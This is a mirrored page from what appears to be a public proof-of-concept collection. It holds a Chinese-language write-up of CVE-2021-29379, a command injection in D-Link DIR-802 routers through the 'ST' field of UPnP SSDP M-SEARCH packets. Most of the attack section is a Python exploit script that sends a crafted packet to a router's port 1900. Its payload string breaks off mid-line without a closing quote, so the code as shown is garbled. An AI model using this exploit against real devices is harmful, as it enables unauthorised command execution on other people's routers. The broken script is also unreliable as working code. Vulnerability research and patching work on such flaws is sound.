admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 04:18:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/D-Link DIR-802 命令注入漏洞 CVE-2021-29379.md

35 lines
1000 B
Markdown
Raw Normal View History

更新漏洞
2022-12-06 17:17:54 +08:00
# D-Link DIR-802 命令注入漏洞 CVE-2021-29379
## 漏洞描述
DIR-802中存在一个命令注入漏洞攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。
与CVE-2020-15893相似在固件版本v-1.00b05之前的D-Link DIR-802 A1上发现了一个问题。默认情况下端口1900上启用了通用即插即用UPnP。攻击者可以通过将有效负载注入SSDP M-SEARCH发现数据包的“搜索目标”ST字段来执行命令注入。
参考链接:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29379
- https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/
## 漏洞影响
```
DIR-802 hardware revision Ax before v1.00b05
```
## 漏洞复现
poc
```python
# coding: utf-8
import socket
import struct
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:192.168.0.1:1900\r\nST:urn:schemas-upnp-org:service
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("192.168.0.1", 1900))
s.send(buf)
s.close()
```
Reference in New Issue Copy Permalink